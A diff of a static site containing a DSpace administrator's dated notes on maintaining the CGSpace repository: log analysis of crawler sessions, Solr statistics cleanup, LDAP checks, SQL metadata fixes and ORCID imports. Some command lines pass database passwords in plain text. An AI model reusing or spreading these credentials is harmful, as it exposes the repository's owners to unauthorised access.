      +$ cat dspace.log.2020-08-04 | grep "64.62.202.71" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       5691
       
      • 38.128.66.10 isn’t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:
      • @@ -318,8 +318,8 @@ Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
      • And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):
      -
      $ cat dspace.log.2020-08-04 | grep "199.47.87.145" | grep -E 'sessi
      -on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2020-08-04 | grep "199.47.87.145" | grep -E 'sessi
      +on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2777
       
      • I will add Turnitin to the Tomcat Crawler Session Manager Valve regex as well…
      • @@ -377,8 +377,8 @@ on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
        • The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:
        -
        Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        -java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        +
        Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
        +java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
        @@ -398,71 +398,71 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
         
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/[0-9]+/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/[0-9]+/</query></delete>'
     

    2020-08-09

    • The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space…
    • I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:
    -
    # grep -oE "Record uid: ([a-f0-9\\-]*){1} couldn't be processed" /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 > /tmp/not-processed-errors.txt
    +
    # grep -oE "Record uid: ([a-f0-9\\-]*){1} couldn't be processed" /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 > /tmp/not-processed-errors.txt
     # wc -l /tmp/not-processed-errors.txt
     2202973 /tmp/not-processed-errors.txt
     # sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
    -    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
    -    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
    -    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
    -    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
    -    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
    -    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
    -    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
    -    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
    -    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
    -    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
    +    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
    +    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
    +    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
    +    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
    +    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
    +    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
    +    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
    +    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
    +    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
    +    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
     
    • I looked at some of those records and saw strange objects in their containerCommunity, containerCollection, etc…
    {
    -  "responseHeader": {
    -    "status": 0,
    -    "QTime": 0,
    -    "params": {
    -      "q": "uid:fff1349d-79d5-4ceb-89a1-ce78107d982d",
    -      "indent": "true",
    -      "wt": "json",
    -      "_": "1596957629970"
    +  "responseHeader": {
    +    "status": 0,
    +    "QTime": 0,
    +    "params": {
    +      "q": "uid:fff1349d-79d5-4ceb-89a1-ce78107d982d",
    +      "indent": "true",
    +      "wt": "json",
    +      "_": "1596957629970"
         }
       },
    -  "response": {
    -    "numFound": 1,
    -    "start": 0,
    -    "docs": [
    +  "response": {
    +    "numFound": 1,
    +    "start": 0,
    +    "docs": [
           {
    -        "containerCommunity": [
    -          "155",
    -          "155",
    -          "{set=null}"
    +        "containerCommunity": [
    +          "155",
    +          "155",
    +          "{set=null}"
             ],
    -        "uid": "fff1349d-79d5-4ceb-89a1-ce78107d982d",
    -        "containerCollection": [
    -          "1099",
    -          "830",
    -          "{set=830}"
    +        "uid": "fff1349d-79d5-4ceb-89a1-ce78107d982d",
    +        "containerCollection": [
    +          "1099",
    +          "830",
    +          "{set=830}"
             ],
    -        "owningComm": [
    -          "155",
    -          "155",
    -          "{set=null}"
    +        "owningComm": [
    +          "155",
    +          "155",
    +          "{set=null}"
             ],
    -        "isInternal": false,
    -        "isBot": false,
    -        "statistics_type": "view",
    -        "time": "2018-05-08T23:17:00.157Z",
    -        "owningColl": [
    -          "1099",
    -          "830",
    -          "{set=830}"
    +        "isInternal": false,
    +        "isBot": false,
    +        "statistics_type": "view",
    +        "time": "2018-05-08T23:17:00.157Z",
    +        "owningColl": [
    +          "1099",
    +          "830",
    +          "{set=830}"
             ],
    -        "_version_": 1621500445042147300
    +        "_version_": 1621500445042147300
           }
         ]
       }
    @@ -470,8 +470,8 @@ java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's mo
     
    • I deleted those 11,724 records with the strange “set” object in the collections and communities, as well as 360,000 records with id: -1
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    -$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:\-1</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:\-1</query></delete>'
     
    • I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday the solr cores didn’t all come back up OK
        @@ -487,24 +487,24 @@ $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=tru
      $ cat 2020-08-09-add-ILRI-orcids.csv
       dc.contributor.author,cg.creator.id
      -"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
      -"Delia Grace","Delia Grace: 0000-0002-0195-9489"
      -"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
      -"Ngan Tran Thi","Tran Thi Ngan: 0000-0002-7184-3086"
      -"Dang Xuan Sinh","Sinh Dang-Xuan: 0000-0002-0522-7808"
      -"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0001-9877-0596"
      -"Pham Van Hung","Pham Anh Hung: 0000-0001-9366-0259"
      -"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
      -"Teufel, Nils","Nils Teufel: 0000-0001-5305-6620"
      -"Duncan, Alan J.",Alan Duncan: 0000-0002-3954-3067"
      -"Moodley, Arshnee","Arshnee Moodley: 0000-0002-6469-3948"
      +"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
      +"Delia Grace","Delia Grace: 0000-0002-0195-9489"
      +"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
      +"Ngan Tran Thi","Tran Thi Ngan: 0000-0002-7184-3086"
      +"Dang Xuan Sinh","Sinh Dang-Xuan: 0000-0002-0522-7808"
      +"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0001-9877-0596"
      +"Pham Van Hung","Pham Anh Hung: 0000-0001-9366-0259"
      +"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
      +"Teufel, Nils","Nils Teufel: 0000-0001-5305-6620"
      +"Duncan, Alan J.",Alan Duncan: 0000-0002-3954-3067"
      +"Moodley, Arshnee","Arshnee Moodley: 0000-0002-6469-3948"
       
      • That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:
      dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
       COPY 2095
       dspace=# \q
      -$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq > /tmp/2020-08-09-orcid-identifiers-uniq.csv
      +$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq > /tmp/2020-08-09-orcid-identifiers-uniq.csv
       $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
       1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
       
        @@ -517,9 +517,9 @@ $ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
    -
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
     ...
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
     
    • I added Googlebot and Twitterbot to the list of explicitly allowed bots
        @@ -573,7 +573,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
        • Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:
        -
        Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
        +
        Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
         com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
                 at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
        @@ -598,8 +598,8 @@ Caused by: java.lang.NullPointerException
         
         
      • I purged the unmigrated docs and continued processing:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
      -$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
      +
      $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
      +$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
       $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
       
      • Altmetric asked for a dump of CGSpace’s OAI “sets” so they can update their affiliation mappings @@ -608,8 +608,8 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
    -
    $ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' > /tmp/0.xml
    -$ for num in {100..1300..100}; do http "https://cgspace.cgiar.org/oai/request?verb=ListSets&resumptionToken=////$num" > /tmp/$num.xml; sleep 2; done
    +
    $ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' > /tmp/0.xml
    +$ for num in {100..1300..100}; do http "https://cgspace.cgiar.org/oai/request?verb=ListSets&resumptionToken=////$num" > /tmp/$num.xml; sleep 2; done
     $ for num in {0..1300..100}; do cat /tmp/$num.xml >> /tmp/cgspace-oai-sets.xml; done
     
    • This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that’s how theirs was in the first place…
    • @@ -620,9 +620,9 @@ $ for num in {0..1300..100}; do cat /tmp/$num.xml >> /tmp/cgspace-oai-sets
    • The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs…
    • I looked at a few of the UIDs that it was having problems with and they were unmigrated ones… so I purged them in 2015 and all the rest of the statistics cores
    -
    $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
     ...
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
     

    2020-08-19

    • I tested the DSpace 5 and DSpace 6 versions of the country code tagger curation task and noticed a few things @@ -715,17 +715,17 @@ $ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=tru
    -
    $ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=0' User-Agent:'curl' > /tmp/wle-trade-off-page1.xml
    -$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=100' User-Agent:'curl' > /tmp/wle-trade-off-page2.xml
    -$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=200' User-Agent:'curl' > /tmp/wle-trade-off-page3.xml
    +
    $ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=0' User-Agent:'curl' > /tmp/wle-trade-off-page1.xml
    +$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=100' User-Agent:'curl' > /tmp/wle-trade-off-page2.xml
    +$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=200' User-Agent:'curl' > /tmp/wle-trade-off-page3.xml
     
    -
    $ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page1.xml >> /tmp/ids.txt
    -$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page2.xml >> /tmp/ids.txt
    -$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page3.xml >> /tmp/ids.txt
    +
    $ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page1.xml >> /tmp/ids.txt
    +$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page2.xml >> /tmp/ids.txt
    +$ xmllint --xpath '//*[local-name()="entry"]/*[local-name()="id"]/text()' /tmp/wle-trade-off-page3.xml >> /tmp/ids.txt
     $ sort -u /tmp/ids.txt > /tmp/ids-sorted.txt
    -$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt > /tmp/handles.txt
    +$ grep -oE '[0-9]+/[0-9]+' /tmp/ids.txt > /tmp/handles.txt
     
    • Now I have all the handles for the matching items and I can use the REST API to get each item’s PDFs…
        diff --git a/docs/2020-09/index.html b/docs/2020-09/index.html index 96fe71b1c..d3946d8f2 100644 --- a/docs/2020-09/index.html +++ b/docs/2020-09/index.html @@ -48,7 +48,7 @@ I filed a bug on OpenRXV: https://github.com/ilri/OpenRXV/issues/39 I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40 "/> - + @@ -173,7 +173,7 @@ $ grep -c added /tmp/2020-09-02-countrycodetagger.log
    • I tried to query LDAP directly using the application credentials with ldapsearch and it works:
    -
    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "applicationaccount@cgiarad.org" -W "(sAMAccountName=me)"
    +
    $ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "applicationaccount@cgiarad.org" -W "(sAMAccountName=me)"
     
    • According to the DSpace 6 docs we need to escape commas in our LDAP parameters due to the new configuration system
        @@ -206,8 +206,8 @@ Report Formally Published Poster Unrefereed reprint -$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68 -$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68 +$ ./delete-metadata-values.py -i 2020-09-03-delete-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -m 68 +$ ./fix-metadata-values.py -i 2020-09-03-fix-review-status.csv -db dspace -u dspace -p 'fuuu' -f dc.description.version -t 'correct' -m 68
    • Start reviewing 95 items for IITA (20201stbatch)
        @@ -259,9 +259,9 @@ java.lang.NullPointerException
      • I will update our nearly 6,000 metadata values for CIFOR in the database accordingly:
      -
      dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
      -dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
      -dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
      +
      dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^(http://)?www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/([[:digit:]]+)\.html$', 'https://www.cifor.org/knowledge/publication/\3') WHERE metadata_field_id=219 AND text_value ~ 'www\.cifor\.org/(nc/)?online-library/browse/view-publication/publication/[[:digit:]]+';
      +dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/library/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/library/[[:digit:]]+/?';
      +dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, '^https?://www\.cifor\.org/pid/([[:digit:]]+)/?$', 'https://www.cifor.org/knowledge/publication/\1') WHERE metadata_field_id=219 AND text_value ~ 'https?://www\.cifor\.org/pid/[[:digit:]]+';
       
      • I did some cleanup on the author affiliations of the IITA data our 2019-04 list using reconcile-csv and OpenRefine:
          @@ -328,7 +328,7 @@ AFRICA SOUTH OF SAHARA,SUB-SAHARAN AFRICA NORTH AFRICA,NORTHERN AFRICA WEST ASIA,WESTERN ASIA SOUTHWEST ASIA,SOUTHWESTERN ASIA -$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n +$ ./fix-metadata-values.py -i 2020-09-10-fix-cgspace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d -n Connected to database. Would fix 12227 occurences of: EAST AFRICA Would fix 7996 occurences of: WEST AFRICA @@ -417,7 +417,7 @@ Would fix 3 occurences of: SOUTHWEST ASIA
      -
      value + "__description:" + cells["dc.type"].value
      +
      value + "__description:" + cells["dc.type"].value
       
      • Then I created a SAF bundle with SAFBuilder:
      @@ -477,9 +477,9 @@ Would fix 3 occurences of: SOUTHWEST ASIA
    $ cat 2020-09-17-add-bioversity-orcids.csv
     dc.contributor.author,cg.creator.id
    -"Etten, Jacob van","Jacob van Etten: 0000-0001-7554-2558"
    -"van Etten, Jacob","Jacob van Etten: 0000-0001-7554-2558"
    -$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
    +"Etten, Jacob van","Jacob van Etten: 0000-0001-7554-2558"
    +"van Etten, Jacob","Jacob van Etten: 0000-0001-7554-2558"
    +$ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dspace -u dspace -p 'dom@in34sniper'
     
    • I sent a follow-up message to Atmire to look into the two remaining issues with the DSpace 6 upgrade
        @@ -496,7 +496,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-09-17-add-bioversity-orcids.csv -db dsp
    -
    https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"&rpp=100
    +
    https://cgspace.cgiar.org/open-search/discover?query=type:"Journal Article" AND status:"Open Access" AND crpsubject:"Water, Land and Ecosystems" AND "tradeoffs"&rpp=100
     
    • I noticed that my move-collections.sh script didn’t work on DSpace 6 because of the change from IDs to UUIDs, so I modified it to quote the collection resource_id parameters in the PostgreSQL query
    @@ -538,7 +538,7 @@ dspacestatistics=# SELECT SUM(downloads) FROM items;
    dspace=# BEGIN;
     BEGIN
    -dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
    +dspace=# DELETE FROM metadatavalue WHERE text_value='Report' AND resource_type_id=2 AND metadata_field_id=68;
     DELETE 12
     dspace=# COMMIT;
     
      @@ -573,23 +573,23 @@ dspace=# COMMIT;
    ...
    -item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
    -item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
    +item_ids = ['0079470a-87a1-4373-beb1-b16e3f0c4d81', '007a9df1-0871-4612-8b28-5335982198cb']
    +item_ids_str = ' OR '.join(item_ids).replace('-', '\-')
     ...
     solr_query_params = {
    -    "q": f"id:({item_ids_str})",
    -    "fq": "type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]",
    -    "facet": "true",
    -    "facet.field": "id",
    -    "facet.mincount": 1,
    -    "facet.limit": 1,
    -    "facet.offset": 0,
    -    "stats": "true",
    -    "stats.field": "id",
    -    "stats.calcdistinct": "true",
    -    "shards": shards,
    -    "rows": 0,
    -    "wt": "json",
    +    "q": f"id:({item_ids_str})",
    +    "fq": "type:2 AND isBot:false AND statistics_type:view AND time:[2020-01-01T00:00:00Z TO 2020-09-02T00:00:00Z]",
    +    "facet": "true",
    +    "facet.field": "id",
    +    "facet.mincount": 1,
    +    "facet.limit": 1,
    +    "facet.offset": 0,
    +    "stats": "true",
    +    "stats.field": "id",
    +    "stats.calcdistinct": "true",
    +    "shards": shards,
    +    "rows": 0,
    +    "wt": "json",
     }
     
    • The date range format for Solr is important, but it seems we only need to add T00:00:00Z to the normal ISO 8601 YYYY-MM-DD strings
    • @@ -600,61 +600,61 @@ solr_query_params = {
    $ curl -s -d @request.json https://dspacetest.cgiar.org/rest/statistics/items | json_pp
     {
    -   "currentPage" : 0,
    -   "limit" : 10,
    -   "statistics" : [
    +   "currentPage" : 0,
    +   "limit" : 10,
    +   "statistics" : [
           {
    -         "downloads" : 3329,
    -         "id" : "b2c1bbfd-65b0-438c-9e49-d271c49b2696",
    -         "views" : 1565
    +         "downloads" : 3329,
    +         "id" : "b2c1bbfd-65b0-438c-9e49-d271c49b2696",
    +         "views" : 1565
           },
           {
    -         "downloads" : 3797,
    -         "id" : "f44cf173-2344-4eb2-8f00-ee55df32c76f",
    -         "views" : 48
    +         "downloads" : 3797,
    +         "id" : "f44cf173-2344-4eb2-8f00-ee55df32c76f",
    +         "views" : 48
           },
           {
    -         "downloads" : 11064,
    -         "id" : "8542f9da-9ce1-4614-abf4-f2e3fdb4b305",
    -         "views" : 26
    +         "downloads" : 11064,
    +         "id" : "8542f9da-9ce1-4614-abf4-f2e3fdb4b305",
    +         "views" : 26
           },
           {
    -         "downloads" : 6782,
    -         "id" : "2324aa41-e9de-4a2b-bc36-16241464683e",
    -         "views" : 19
    +         "downloads" : 6782,
    +         "id" : "2324aa41-e9de-4a2b-bc36-16241464683e",
    +         "views" : 19
           },
           {
    -         "downloads" : 48,
    -         "id" : "0fe573e7-042a-4240-a4d9-753b61233908",
    -         "views" : 12
    +         "downloads" : 48,
    +         "id" : "0fe573e7-042a-4240-a4d9-753b61233908",
    +         "views" : 12
           },
           {
    -         "downloads" : 0,
    -         "id" : "000e61ca-695d-43e5-9ab8-1f3fd7a67a32",
    -         "views" : 4
    +         "downloads" : 0,
    +         "id" : "000e61ca-695d-43e5-9ab8-1f3fd7a67a32",
    +         "views" : 4
           },
           {
    -         "downloads" : 0,
    -         "id" : "000dc7cd-9485-424b-8ecf-78002613cc87",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000dc7cd-9485-424b-8ecf-78002613cc87",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000e1616-3901-4431-80b1-c6bc67312d8c",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000e1616-3901-4431-80b1-c6bc67312d8c",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000ea897-5557-49c7-9f54-9fa192c0f83b",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000ea897-5557-49c7-9f54-9fa192c0f83b",
    +         "views" : 1
           },
           {
    -         "downloads" : 0,
    -         "id" : "000ec427-97e5-4766-85a5-e8dd62199ab5",
    -         "views" : 1
    +         "downloads" : 0,
    +         "id" : "000ec427-97e5-4766-85a5-e8dd62199ab5",
    +         "views" : 1
           }
        ],
    -   "totalPages" : 13
    +   "totalPages" : 13
     }
     
    • I deployed it on DSpace Test and sent a note to Salem so he can test it
    • diff --git a/docs/2020-10/index.html b/docs/2020-10/index.html index dcf7db1c7..9dd63e52a 100644 --- a/docs/2020-10/index.html +++ b/docs/2020-10/index.html @@ -44,7 +44,7 @@ During the FlywayDB migration I got an error: "/> - + @@ -144,10 +144,10 @@ During the FlywayDB migration I got an error:
    -
    2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
    +
    2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Batch entry 0 update public.bitstreamformatregistry set description='Electronic publishing', internal='FALSE', mimetype='application/epub+zip', short_description='EPUB', support_level=1 where bitstream_format_id=78 was aborted: ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
       Detail: Key (short_description)=(EPUB) already exists.  Call getNextException to see other errors in the batch.
     2020-10-06 21:36:04,138 WARN  org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ SQL Error: 0, SQLState: 23505
    -2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
    +2020-10-06 21:36:04,138 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: duplicate key value violates unique constraint "bitstreamformatregistry_short_description_key"
       Detail: Key (short_description)=(EPUB) already exists.
     2020-10-06 21:36:04,142 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [could not execute batch]
     2020-10-06 21:36:04,143 ERROR org.dspace.storage.rdbms.DatabaseRegistryUpdater @ Error attempting to update Bitstream Format and/or Metadata Registries
    @@ -233,7 +233,7 @@ New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
      + Added   (dc.title): Testing CUA import NPE
     Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
     Error while updating
